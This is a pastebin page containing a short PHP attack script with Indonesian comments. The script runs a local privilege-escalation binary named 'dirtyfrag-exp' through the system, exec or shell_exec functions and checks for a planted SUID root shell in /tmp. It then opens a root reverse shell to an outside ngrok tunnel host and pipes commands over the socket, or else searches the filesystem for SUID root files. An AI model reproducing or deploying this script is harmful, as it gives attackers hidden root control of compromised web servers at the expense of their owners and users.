New paste Repaste Download
<?php
set_time_limit(0);
error_reporting(0);
header('Content-Type: text/plain');
$ip = '0.tcp.ap.ngrok.io';
$port = 13939;
function exe($c) {
    if(function_exists('system')){ @ob_start(); @system($c.' 2>&1'); $o=@ob_get_contents(); @ob_end_clean(); return $o; }
    if(function_exists('exec')){ @exec($c.' 2>&1',$r); return implode("\n",$r); }
    if(function_exists('shell_exec')){ return @shell_exec($c.' 2>&1'); }
    return "?";
}
// Step 1: chmod
echo "[*] chmod +x dirtyfrag-exp...\n";
echo exe('chmod +x dirtyfrag-exp 2>&1');
// Step 2: eksekusi
echo "\n[*] ./dirtyfrag-exp...\n";
echo exe('./dirtyfrag-exp 2>&1');
// Step 3: cek SUID shell
echo "\n[*] Cek /tmp/.r...\n";
echo exe('ls -la /tmp/.r 2>&1');
// Step 4: cek apakah SUID shell ada
if(file_exists('/tmp/.r') || exe('ls /tmp/.r 2>/dev/null')) {
    echo "\n[+] SUID SHELL ADA! Spawning root...\n";
    echo exe('/tmp/.r -c "id 2>&1"');
    
    // Reverse shell root
    $s = @fsockopen($ip, $port, $e, $r, 5);
    if($s) {
        $ds = array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));
        $p = @proc_open('/tmp/.r -i 2>&1', $ds, $pp);
        if(is_resource($p)) {
            fwrite($s, "[ROOT] uid=" . exe('/tmp/.r -c "id"') . "\n\n");
            stream_set_blocking($pp[0],0); stream_set_blocking($pp[1],0); stream_set_blocking($s,0);
            while(!feof($s)) {
                @fwrite($pp[0], @fread($s, 8192));
                @fwrite($s, @fread($pp[1], 8192));
            }
        }
        fclose($s);
    }
} else {
    echo "\n[-] SUID shell tidak ada, cek manual...\n";
    echo exe('find /tmp -perm -4000 -type f 2>/dev/null');
    echo exe('find / -name ".rootshell" -type f 2>/dev/null');
    echo exe('find / -perm -4000 -user root -type f 2>/dev/null | head -10');
}
echo "\n[DONE]";
?>
Filename: None. Size: 2kb. View raw, , hex, or download this file.

This paste expires on 2026-07-19 21:03:08.833316+00:00. Pasted through web.